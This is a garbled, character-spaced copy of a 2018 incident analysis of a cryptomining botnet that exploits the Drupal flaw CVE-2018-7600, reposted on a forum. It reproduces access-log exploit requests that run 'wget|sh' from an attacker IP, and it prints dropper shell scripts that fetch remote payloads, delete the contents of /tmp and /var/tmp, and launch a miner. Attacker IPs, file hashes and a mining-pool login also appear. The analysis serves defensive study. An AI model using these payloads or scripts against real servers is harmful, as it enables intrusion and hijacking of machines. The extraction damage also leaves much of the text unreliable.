[13428] 2018-11-17_利用Drupal漏洞进行传播的挖矿僵尸病毒分析

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-18
2018-11-17_利用Drupal漏洞进行传播的挖矿僵尸病毒分析 D r u p a l c g f 9 9   F r e e B u f   2 0 1 8 - 1 1 - 1 7 n g i x a c c e s s . l o g 访 访 N g i x   w i n d o w s 1 0 w e b n g i n x / 1 . 1 2 . 2 I P 8 5 . 2 4 8 . 2 2 7 . 1 6 3 1 6 / O c t / 2 0 1 8 : 1 3 : 1 4 : 4 1 + 0 8 0 0 P O S T   / ? q = u s e r % 2 F p a s s w o r d & n a m e % 5 B % 2 3 p o s t _ r e n d e r % 5 D % 5 B % 5 D = p a s s t h r u & n a m e % 5 B % 2 3 m a r k u p % 5 D = n o h u p + w g e t + - O + - + h t t p % 3 A % 2 F % 2 F 1 6 4 . 1 3 2 . 1 5 9 . 5 6 % 2 F d r u p a l % 2 F u p . s h % 7 C s h + 2 % 3 E % 2 6 1 & n a m e % 5 B % 2 3 t y p e % 5 D = m a r k u p   H T T P / 1 . 1   3 0 1   1 8 5   -   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 5 1 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 5 1 . 0 8 5 . 2 4 8 . 2 2 7 . 1 6 3 1 6 / O c t / 2 0 1 8 : 1 3 : 1 4 : 4 1 + 0 8 0 0 G E T   / ? q = u s e r % 2 F p a s s w o r d & n a m e % 5 B % 2 3 p o s t _ r e n d e r % 5 D % 5 B % 5 D = p a s s t h r u & n a m e % 5 B % 2 3 m a r k u p % 5 D = n o h u p + w g e t + - O + - + h t t p % 3 A % 2 F % 2 F 1 6 4 . 1 3 2 . 1 5 9 . 5 6 % 2 F d r u p a l % 2 F u p . s h % 7 C s h + 2 % 3 E % 2 6 1 & n a m e % 5 B % 2 3 t y p e % 5 D = m a r k u p   H T T P / 1 . 1   2 0 0   8 5 1 7   -   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 5 1 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 5 1 . 0 8 5 . 2 4 8 . 2 2 7 . 1 6 3 1 6 / O c t / 2 0 1 8 : 1 3 : 1 4 : 4 3 + 0 8 0 0 P O S T   / ? q = u s e r % 2 F p a s s w o r d & n a m e % 5 B % 2 3 p o s t _ r e n d e r % 5 D % 5 B % 5 D = p a s s t h r u & n a m e % 5 B % 2 3 m a r k u p % 5 D = n o h u p + c u r l + h t t p % 3 A % 2 F % 2 F 1 6 4 . 1 3 2 . 1 5 9 . 5 6 % 2 F d r u p a l % 2 F u p . s h % 7 C s h + 2 % 3 E % 2 6 1 & n a m e % 5 B % 2 3 t y p e % 5 D = m a r k u p H T T P / 1 . 1   3 0 1   1 8 5   -   M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 3 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 6 . 0 . 2 9 2 4 . 8 7   S a f a r i / 5 3 7 . 3 6 8 5 . 2 4 8 . 2 2 7 . 1 6 5 1 6 / O c t / 2 0 1 8 : 1 3 : 1 4 : 4 7 + 0 8 0 0 ] G E T   / ? q = u s e r % 2 F p a s s w o r d & n a m e % 5 B % 2 3 p o s t _ r e n d e r % 5 D % 5 B % 5 D = p a s s t h r u & n a m e % 5 B % 2 3 m a r k u p % 5 D = n o h u p + c u r l + h t t p % 3 A % 2 F % 2 F 1 6 4 . 1 3 2 . 1 5 9 . 5 6 % 2 F d r u p a l % 2 F u p . s h % 7 C s h + 2 % 3 E % 2 6 1 & n a m e % 5 B % 2 3 t y p e % 5 D = m a r k u p H T T P / 1 . 1   2 0 0   8 5 1 7   -   M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 3 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 6 . 0 . 2 9 2 4 . 8 7   S a f a r i / 5 3 7 . 3 6 w e b 访 G E T P O S T 访 h t t p s : / / m y w e b s i t e / ? q = u s e r / p a s s w o r d & n a m e [ # p o s t _ r e n d e r ] [ ] = p a s s t h r u & n a m e [ # m a r k u p ] = n o h u p   w g e t   O   -   h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / u p . s h s h   2 > & 1 & n a m e [ # t y p e ] = m a r k u p h t t p s : / / m y w e b s i t e / ? q = u s e r / p a s s w o r d & n a m e [ # p o s t _ r e n d e r ] [ ] = p a s s t h r u & n a m e [ # m a r k u p ] = n o h u p   c u r l   h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / u p . s h s h   2 > & 1 & n a m e [ # t y p e ] = m a r k u p w e b w g e t c u r l u p . s h w i n d o w s w e b w e b N g i x l i n u x D r u p a l C V E - 2 0 1 8 - 7 6 0 0 D r u p a l 使 w e b 访 D r u p a l 1 . 访 h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / u p . s h u p . s h b u p s . s h b u p s . j p g i d 0 i d 1 / v a r / t m p / t m p / h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / o o o i d 1 a t n d i d 0 i d 0 [ [ ^ $ I $ ^ ] ] 访 o o o 2 1 1 7 6 M D 5 7 f d c 3 1 d 7 b 9 f a f d 2 f b b b 4 d a 2 2 b 3 c f 5 6 a 2 S H A 1 4 e 8 b d c a 8 d 9 a 2 e e c 2 3 f 1 7 2 0 6 a f 6 e 9 f 7 0 d a a d 2 9 a 2 5 2 . U b u n t u 1 6 . 0 4 o o o / v a r / t m p / a t n d u b u n t u 退 w i r e s h a r k 8 0 . 2 4 0 . 2 6 . 5 2 1 6 4 . 1 3 2 . 1 5 9 . 5 6 I P 1 . 访 h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / l u . s h l u . s h 访 b u p s . s h b u p s . j p g 2 . h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / b u p s . s h 3 . h t t p : / /   1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / o o o 4 . h t t p : / /   1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / o o o 5 . h t t p : / /   8 0 . 2 4 0 . 2 6 . 5 2 / d / s s s 6 . h t t p : / /   8 0 . 2 4 0 . 2 6 . 5 2 / d / l m m m l # ! / b i n / s h c r o n t a b - r ; i d 0 = " [ [ ^ $ I $ ^ ] ] " i d 1 = " a t n d " p s   - f e | g r e p   - v   g r e p   |   g r e p   - q   " ` e c h o   $ i d 0 ` | ` e c h o   $ i d 1 ` " i f   [   $ ? - n e   0   ] ; t h e n w g e t   - O -   h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / b u p s . s h | s h   ;   c u r l   h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / b u p s . j p g | s h   ; e l s e e c h o " . . . . . . . " f i   # ! / b i n / s h i d 0 = " [ [ ^ $ I $ ^ ] ] " i d 1 = " a t n d " i d 2 = " o o o " p s   - f e   | g r e p   - v   g r e p   |   g r e p   - q   " ` e c h o $ i d 0 ` | ` e c h o   $ i d 1 ` " i f   [   $ ?   - n e   0   ] ; t h e n i f   [   - x   " / v a r / t m p / "   ]   & & [   - w   " / v a r / t m p / "   ] ; t h e n r m   - r f   / v a r / t m p / . * r m   - r f   / v a r / t m p / * w g e t   - O   / v a r / t m p / ` e c h o   $ i d 1 ` h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / ` e c h o   $ i d 2 ` c u r l   - o   / v a r / t m p / ` e c h o   $ i d 1 ` h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / ` e c h o   $ i d 2 ` c h m o d   + x   / v a r / t m p / ` e c h o   $ i d 1 ` c h m o d   7 7 7   / v a r / t m p / a t n d / v a r / t m p / ` e c h o   $ i d 1 `   & e l s e r m   - r f   / t m p / . * r m   - r f   / t m p / * w g e t   - O   / t m p / ` e c h o   $ i d 1 ` h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / ` e c h o   $ i d 2 ` c u r l   - o   / t m p / ` e c h o   $ i d 1 ` h t t p : / / 1 6 4 . 1 3 2 . 1 5 9 . 5 6 / d r u p a l / 2 / ` e c h o   $ i d 2 ` c h m o d   + x   / t m p / ` e c h o   $ i d 1 ` c h m o d   7 7 7   / t m p / a t n d / t m p / ` e c h o   $ i d 1 `   & f i e l s e e c h o   " R u n n i n g . . . . . " f i
1 - 4 5 6 M D 5 S H A 1 s s s 1 6 3 6 0 8 a 8 d d c e 6 4 e 5 d d 6 f 5 8 6 4 d a 1 8 d 7 8 9 9 3 5 1 c e d b 7 a a c 7 8 8 c b 2 5 a 2 f 3 6 b d 7 1 2 4 4 8 4 3 a 9 2 8 9 a 9 7 d 4 e l m m m l 7 1 9 1 4 4 2 e 4 8 3 f e 7 7 3 6 6 3 4 1 3 4 b 1 b 0 d 8 2 8 2 8 f 2 e 5 3 5 8 3 f 5 a 6 6 1 1 7 f 7 6 a 9 d e a 3 8 9 0 7 0 e d 0 c 8 4 7 0 e 3 3 0 e 4 7 3 . I P 1 . I P N g i x I P 8 5 . 2 4 8 . 2 2 7 . 1 6 3 8 5 . 2 4 8 . 2 2 7 . 1 6 5 i p 1 3 8 8 0 4 4 3 h t t p 访 T o r h t t p s 访 E n n . l u p i n g e n n . l u P i n g   e n n . l u   [ 1 7 6 . 1 0 . 2 5 0 . 1 0 5 ]     3 2   : 1 7 6 . 1 0 . 2 5 0 . 1 0 5   :   = 3 2   = 3 1 0 m s   T T L = 4 7 1 7 6 . 1 0 . 2 5 0 . 1 0 5   :   = 3 2   = 3 0 8 m s   T T L = 4 7 1 7 6 . 1 0 . 2 5 0 . 1 0 5   :   = 3 2   = 3 0 9 m s   T T L = 4 7   1 7 6 . 1 0 . 2 5 0 . 1 0 5   :   = 3 2   = 3 0 8 m s   T T L = 4 7 I P 访 e n n . l u h t t p s 访 h t t p : / / 8 5 . 2 4 8 . 2 2 7 . 1 6 3 e n n . l u 8 5 . 2 4 8 . 2 2 7 . 1 6 3 8 5 . 2 4 8 . 2 2 7 . 1 6 5 8 5 . 2 4 8 . 2 2 7 . 1 6 4 E n n . l u I P 2 . h t t p s h 访 1 6 4 . 1 3 2 . 1 5 9 . 5 6 I P h t t p 访 3 . o o o o o o 访 8 0 . 2 4 0 . 2 6 . 5 2 s s s l m m m l 8 0 . 2 4 0 . 2 6 . 5 2 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _   I P : 1 6 4 . 1 3 2 . 1 5 9 . 5 6   1 o v h . c o m 2 I P v 6 : : A 4 8 4 : 9 F 3 8 I P v 6 : : F F F F : A 4 8 4 : 9 F 3 8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ N o t   F o u n d T h e   r e q u e s t e d   U R L   /   w a s   n o t   f o u n d   o n   t h i s   s e r v e r . _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ A p a c h e / 2 . 4 . 1 8   ( U b u n t u )   S e r v e r   a t   1 6 4 . 1 3 2 . 1 5 9 . 5 6   P o r t   8 0 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _         I P : 8 0 . 2 4 0 . 2 6 . 5 2   1   2 I P v 6 : : 5 0 F 0 : 1 A 3 4 I P v 6 : : F F F F : 5 0 F 0 : 1 A 3 4 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
访 1 . o o o 1 . k i l l / p r o c / P I D < = 1 0 0 0 a t n d [ ^ $ I $ ^ ] 2 . 3 . 4 . w g e t w g e t c u r l b a s e 6 4 5 . w h i l e s l e e p 2 . l m m m l l m m m l l m m m l 1 . L m m m l [ ^ $ I $ ^ ] 4 0 3   F o r b i d d e n _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ n g i n x / 1 . 1 0 . 3   ( U b u n t u )
2 . 9 5 . 1 7 9 . 1 5 3 . 2 2 9 : 7 7 7 7 I D A 9 5 . 1 7 9 . 1 5 3 . 2 2 9 7 7 7 7 8 0 x 访 9 5 . 1 7 9 . 1 5 3 . 2 2 9 8 0 7 7 7 7 M i n i n g   P r o x y   O n l i n e l m m m l x m i n i n g - p r o x y x p r o x y 1 . w e b 访 2 . D r u p a l 3 . 4 . x 5 . 8 5 . 2 4 8 . 2 2 7 . 1 6 3 / 8 5 . 2 4 8 . 2 2 7 . 1 6 4 / 8 5 . 2 4 8 . 2 2 7 . 1 6 5 I P D r u p a l 1 6 4 . 1 3 2 . 1 5 9 . 5 6 ,   8 0 . 2 4 0 . 2 6 . 5 2 * c g f 9 9 F r e e B u f { " i d " : 1 , " j s o n r p c " : " 2 . 0 " , " m e t h o d " : " l o g i n " , " p a r a m s " : { " l o g i n " : " x " , " p a s s " : " x " , " a g e n t " : " h t t p " , " a l g o " : [ " c n " , " c n / 2 " , " c n / 1 " , " c n / 0 " , " c n / x t l " , " c n / m s r " , " c n / x a o " , " c n / r t o " ] } }

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则